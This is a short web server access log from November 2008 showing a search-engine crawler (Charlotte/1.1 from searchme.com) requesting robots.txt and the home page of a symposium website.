208.111.154.15 - - [29/Nov/2008:04:06:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [29/Nov/2008:04:06:24 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
